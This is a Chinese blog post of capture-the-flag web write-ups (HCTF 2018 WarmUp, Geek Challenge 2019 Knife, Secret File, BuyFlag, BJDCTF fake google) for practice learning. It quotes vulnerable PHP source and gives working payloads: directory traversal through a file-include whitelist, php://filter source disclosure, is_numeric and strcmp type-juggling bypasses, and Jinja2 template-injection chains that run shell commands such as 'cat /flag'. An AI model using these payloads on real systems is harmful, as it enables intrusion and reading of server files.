[HCTF 2018]WarmUp&[极客大挑战 2019]Knife&[极客大挑战 2019]Secret File&[极客大挑战 2019]BuyFlag

最新推荐文章于 2024-04-15 09:12:45 发布
最新推荐文章于 2024-04-15 09:12:45 发布
阅读量366 收藏 1
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Anton__1/article/details/116644598
版权

[HCTF 2018]WarmUp

打开之后硕大的一张滑稽
F12一下看看有没有提示

在这里插入图片描述

发现了source.php

得到了一串PHP

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

发现还有一个hint.php

打开后提示

flag not here, and flag in ffffllllaaaagggg

再回去看看PHP代码

看到了有一个checkfile函数

往下看

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );

mb_substr(str1,start,[length][,[str2]]):是在str1从start开始length为长度截取字符串,str2是表示字符编码 mb_strpos(str1,str2):查找str2在str1中出现的位置

首先想到怎么绕过

可以构造payload:

file=hint.php?/../../../../../../../../ffffllllaaaagggg

拿到flag

flag{ceb7304c-7983-4578-bd58-db130b4b22f3}

https://blog.csdn.net/weixin_47174945/article/details/109500269 大师傅的详细解题步骤

[极客大挑战 2019]Knife

打开就是啪的一下!!!很快嗷!

直接一个shell丢在脸上

在这里插入图片描述

打开蚁剑 直接链接拿Flag!!!

[极客大挑战 2019]Secret File

打开就是这个样子

在这里插入图片描述

老规矩F12一下看看有没有详细信息

在这里插入图片描述

发现一个php,点进去是这样的

在这里插入图片描述

用Burpsuite抓一下包拿到了这个

在这里插入图片描述

打开是一串PHP

<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>

首先

strstr() — 查找字符串的首次出现
stristr() — strstr() 函数的忽略大小写版本

也就是:

要GET一个file参数过去,但是不能含有…/、tp、input、data,包括这些的大小写。不含有这些的话就会包含file指定的文件,php://伪协议
php://filter可以使用

https://blog.csdn.net/qq_33020901/article/details/78706764 php伪协议

接下来构造payload:

?file=php://filter/read=convert.base64-encode/resource=flag.php

拿到了base64加密的代码

PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KCiAgICA8aGVhZD4KICAgICAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICAgICAgPHRpdGxlPkZMQUc8L3RpdGxlPgogICAgPC9oZWFkPgoKICAgIDxib2R5IHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOyI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPGgxIHN0eWxlPSJmb250LWZhbWlseTp2ZXJkYW5hO2NvbG9yOnJlZDt0ZXh0LWFsaWduOmNlbnRlcjsiPuWViuWTiO+8geS9oOaJvuWIsOaIkeS6hu+8geWPr+aYr+S9oOeci+S4jeWIsOaIkVFBUX5+fjwvaDE+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPHAgc3R5bGU9ImZvbnQtZmFtaWx5OmFyaWFsO2NvbG9yOnJlZDtmb250LXNpemU6MjBweDt0ZXh0LWFsaWduOmNlbnRlcjsiPgogICAgICAgICAgICA8P3BocAogICAgICAgICAgICAgICAgZWNobyAi5oiR5bCx5Zyo6L+Z6YeMIjsKICAgICAgICAgICAgICAgICRmbGFnID0gJ2ZsYWd7YWEyNTVjNGYtOTFiZi00MjJhLThlMzItNjc4ZjAzZWQ0NGNlfSc7CiAgICAgICAgICAgICAgICAkc2VjcmV0ID0gJ2ppQW5nX0x1eXVhbl93NG50c19hX2cxcklmcmkzbmQnCiAgICAgICAgICAgID8+CiAgICAgICAgPC9wPgogICAgPC9ib2R5PgoKPC9odG1sPgo=

解密一下:

<!DOCTYPE html>

<html>

    <head>
        <meta charset="utf-8">
        <title>FLAG</title>
    </head>

    <body style="background-color:black;"><br><br><br><br><br><br>
        
        <h1 style="font-family:verdana;color:red;text-align:center;">啊哈!你找到我了!可是你看不到我QAQ~~~</h1><br><br><br>
        
        <p style="font-family:arial;color:red;font-size:20px;text-align:center;">
            <?php
                echo "我就在这里";
                $flag = 'flag{aa255c4f-91bf-422a-8e32-678f03ed44ce}';
                $secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
            ?>
        </p>
    </body>

</html>
Alt+1

好家伙,想要个女朋友…

[极客大挑战 2019]BuyFlag

打开是这个样子!

在这里插入图片描述

F12一下发现了pay.php(从网页的菜单里电进去也一样)

burpsuite抓一下

在这里插入图片描述

回去看网页

在这里插入图片描述

提示得是CUIT的学生
那么 Cookie user 改成 1

send 一下 又提示得提交密码

在源代码里发现了:

<!--
	~~~post money and password~~~
if (isset($_POST['password'])) {
	$password = $_POST['password'];
	if (is_numeric($password)) {
		echo "password can't be number</br>";
	}elseif ($password == 404) {
		echo "Password Right!</br>";
	}
}
-->

传一下password 提示需要给钱

但是不能为纯数字 所以构造password为404a

is_numberic漏洞 让password为404%20或者404%00或者404a都可以绕过。

然后提示需要给钱QAQ 盲猜还有个money需要传值

传了一下

提示length超长

百度了一下发现了php strcmp()漏洞

https://blog.csdn.net/cherrie007/article/details/77473817

则传

money[]=1

在这里插入图片描述

得到flag

flag{03a0544e-e496-4790-b66d-2e6d5359be31}

PS:

Burpsuite POST传值需要加 Content-Type: application/x-www-form-urlencoded

[BJDCTF 2nd]fake google

SSTi 一些简单的注入

{{config}}可以获取当前设置
{{self}}
{{self.__dict__._TemplateReference__context.config}} 同样可以看到config
().__class__.__bases__[0].__subclasses__() 
---查看可用模块

().__class__.base__.__subclasses__().index(warnings.catch_warnings)
可以查看当前位置,不过题目环境不能用。手动数吧= = 169位

{{().__class__.__bases__[0].__subclasses__()[169].__init__.__globals__.__builtins__['eval']("__import__('os').popen('whoami').read()")}}
发现可以执行,构造命令
{{''.__class__.__mro__[1].__subclasses__()[169].__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()")}}
没有什么过滤= =友好!


{{().__class__.__bases__[0].__subclasses__()[177].__init__.__globals__.__builtins__[%27open%27](%27/flag%27).read()}}
H3h3QAQ
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
knife-1.8-jar-with-dependencies.jar
04-21
一个将有用的小功能加入到右键菜单的burp suite插件,github:https://github.com/bit4woo/knife
大文件切割器-knife
04-05
可以把任意类型的大文件分割成很多小文件,然后在另一个地方,把那些小文件还原成大文件,因为就是简单的分割与合并,所以理论上是兼容其他分割文件工具的。支持4G以上的大文件分割,针对多线程和大文件做了优化,对于多核电脑应该可以提升不少文件分割、合并效率。
大文件切割利器Knife
08-28
1. 可以精准、快速地切割/复原任何大文件,一个字节也不差。   本款大文件分割软件最大的特色是,对于大小超过4GB的所谓“巨型”文件,也可轻松、快速地分割/复原,只要你可用的存储空间足够。   2. 支持分割的文件格式不拘,纯粹二进制切割。切割进度用 百分比文字 + 进度条显示。   电影文件、MS Virtual Machine(.VHD),抑或任何其他格式的文件,均可精准切割/复原。   3. 纯绿色软件,无需安装。   这意味着,你只需将应用程序包解压后得到的整个文件夹,Copy到你的电脑,点击Knife.exe即可执行;无需执行安装动作。   为了方便以后操作,你也可以在Windows桌面,自行建立,Knife.exe 的 shortcut。   4. 简洁易用;而且短小精悍,只有区区100多KB。在 Windows 7 简体中文版上,实际测试通过。
【网络安全入门】AntSword(蚁剑)实战解题详析
等风来
04-27 2701
[网络安全]AntSword(蚁剑)实战解题详析(入门)
BUUCTF Web [极客挑战 2019]EasySQL & [HCTF 2018]WarmUp & [极客挑战 2019]Havefun & [ACTF2020 新生赛]Include
网安小趴菜
08-28 311
[极客挑战 2019]EasySQL,[HCTF 2018]WarmUp,[极客挑战 2019]Havefun,[ACTF2020 新生赛]Include
BUUCTF——web(WarmUp、[极客挑战 2019]EasySQL)
LizePing_的博客
07-13 323
BUUCTF-webwarmUp(考点;PHP 代码审计)做题思路[极客挑战 2019]EasySQL做题思路(考点:苟住,猥琐发育) 题目可食用,不慌。 warmUp(考点;PHP 代码审计) 做题思路 直接参考我的博客,才发现两个靶场题目一样 传送门: 题解地址 [极客挑战 2019]EasySQL 做题思路(考点:苟住,猥琐发育) 图片有点小帅 乍一看是个登录sql考点,试试万能密码, 1’or 1=1 or ‘1’='1# 哦,它出来了。 好吧,挖能密码的意思是,可以把查找语句拼接成后
[HCTF 2018]WarmUp极客挑战 2019]EasySQL;[极客挑战 2019]Havefun;[强网杯 2019]随便注
feiniaotjx的博客
10-29 140
HCTF 2018]WarmUp 打开题目,可知存在source.php 访问source.php得到源码,访问hint.php得到提示 分析源码 if (! empty($_REQUEST['file'])#首先传入一个参数`file` && is_string($_REQUEST['file'])#判断file是否为字符串 && emmm::checkFile($_REQUEST['file'])#并将参数传递给checkFile
[HCTF 2018]WarmUp 1
su382483531的博客
05-02 462
今天做[HCTF 2018]WarmUp1 的题目,php代码看懂了,但是对于各位师傅构造的payload还是有些疑惑 payload如下 file=hint.php%253f/../../../../../../../../ffffllllaaaagggg
[HCTF 2018]WarmUp 1 滑稽图(详解)
m0_62879498的博客
03-06 4033
[HCTF 2018]WarmUp 1 查看页面源代码,发现html中忽视了 source.php ,接下来我们访问 source.php <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>
BUUCTF-EasySQL、WarmUp、Havefun、Include
m0_62905261的博客
06-07 563
目录[极客挑战 2019]EasySQL[HCTF 2018]WarmUp[极客挑战 2019]Havefun[ACTF2020 新生赛]Include打开靶机直接尝试万能密码,账号admin' or 1=1#,密码随意 打开靶机,里面有一个大大的表情包 按f12查看源码,发现了source.php 直接url进行访问得到了php代码 在这段代码中发现了hint.txt,仍然是url进行访问查看 发现flag在ffffllllaaaagggg中 构造payload source.php?file=h
Knife for File大文件切割复原器 最新版V1.6
07-05
Knife for File 大文件切割/复原器 for Windows 7 或 更高版本 主要特色如下: ------------------------------------------------------------------------------------------------------- 1. 可以精准、快速...
Knife4File大文件分割
09-05
Knife4File大文件分割 nife for File 大文件切割器 ----------------------------------------------------------------------------------------------------- 1.可以精确切割/复原文件,巨型文件(>4GB)也可搞定,...
Knife for File大文件切割复原器 V1.4
12-29
Knife for File大文件切割复原器,2015最新版 V1.4。 纯绿色软件,无需安装;短小精悍,只有区区100多KB。但可以支持,4GB以上的巨大文件之分割与合并,是一款真正意义上的巨型文件的分割/合并利器。 UI支持简体...
knife4file.zip
03-17
对于一些日志的比较大的文件,可以切割成比较小的文件分别查看日志信息。 并且还可以将分片的文件合并起来。
Knife for File 大文件切割/复原器 1.2
03-02
Knife for File 大文件切割/复原器  1.可以精确切割/复原文件,巨型文件(>4GB)也可搞定,只要硬盘剩余空间足够.  2.文件格式不拘,电影文件、MS Virtual Machine(.VHD)、抑或任何其他格式的文件都可精准切割/复原....
ctf赛题secret.php,BUUCTF web 刷几道菜鸡能做的题
weixin_34553878的博客
03-12 613
[WUSTCTF2020]CV Maker(文件上传)1、注册,登录,上传图片马,用bp抓包后将filename后缀改为php,连上蚁剑。[极客挑战 2019]Havefun(简朴代码审计)[极客挑战 2019]Knife1、直接连上蚁剑。果真白给的shell。[极客挑战 2019]EasySQL(万能密码)username=’admin’or 1=1#’ and password=’随便写...
BUUCTF web部分题(二)
yqdid的博客
04-01 1716
[极客挑战 2019]EasySQL 这是一道sq 注入题 ,有用户登录界面,根据之前做sqli_labs的经验,先尝试admin账户。 嗯…不出意料 然后我在用户名输入框内尝试sq注入:admin’ or 1=1# 页面无回显,但是没有报错 接着 我试了试order by 语句 发现有报错: 仔细一看 ,发现 报错语句中有“and password=‘admin’ at line 1”; (直觉 )然后我在密码一栏进行注入 :admin' or 1=1 # 由于是恒真语句,所以成功绕过,直接拿到了
Laykefu客服系统 任意文件上传漏洞,2024年最新34岁程序员年薪50w
最新发布
2401_83739632的博客
04-15 284
Laykefu客服系统/admin/users/upavatar.html接口处存在文件上传漏洞,而且当请求头中Cookie中的”user_name“不为空时即可绕过登录系统后台,恶意攻击者可利用此问题,上传后门文件,获取服务器权限。Laykefu 是一款基于workerman+gatawayworker+thinkphp5搭建的全功能webim客服系统,旨在帮助企业有效管理和提供优质的客户服务。
BUUCTF-部分Web题WP
lqyzkn的博客
10-04 725
[HCTF 2018]WarmUp PHP 代码审计 WP: 拿到题目查看源码,发现一个文件 打开后得到如下源码: 按照提示访问hint.php文件,得到提示: 猜想flag在ffffllllaaaagggg文件里,然后进行php代码审计,发现flag可能包含在file文件夹里了,经过多次尝试目录穿越,得到flag: 当然,这里用hint.php也行。 [极客挑战 2019]Havefun WP: 打开网址查看源码: 看见一段被注释掉的PHP代码。代码提示,如果请求page?cat=xxx,在
用matlab对大量数据进行预处理并预测的代码
05-28
由于不知道您具体的数据类型和预测模型,所以我提供的代码仅供参考,需要您根据具体的数据和模型进行修改和调整。 数据预处理代码示例: ```matlab % 读取数据 data = csvread('data.csv'); ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值